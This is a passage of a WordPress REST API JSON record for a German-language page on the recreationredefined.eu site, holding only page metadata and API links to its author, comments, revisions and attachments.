[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"class_list":["post-4476","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/pages\/4476","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/comments?post=4476"}],"version-history":[{"count":10,"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/pages\/4476\/revisions"}],"predecessor-version":[{"id":6648,"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/pages\/4476\/revisions\/6648"}],"wp:attachment":[{"href":"https:\/\/recreationredefined.eu\/de\/wp-json\/wp\/v2\/media?parent=4476"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}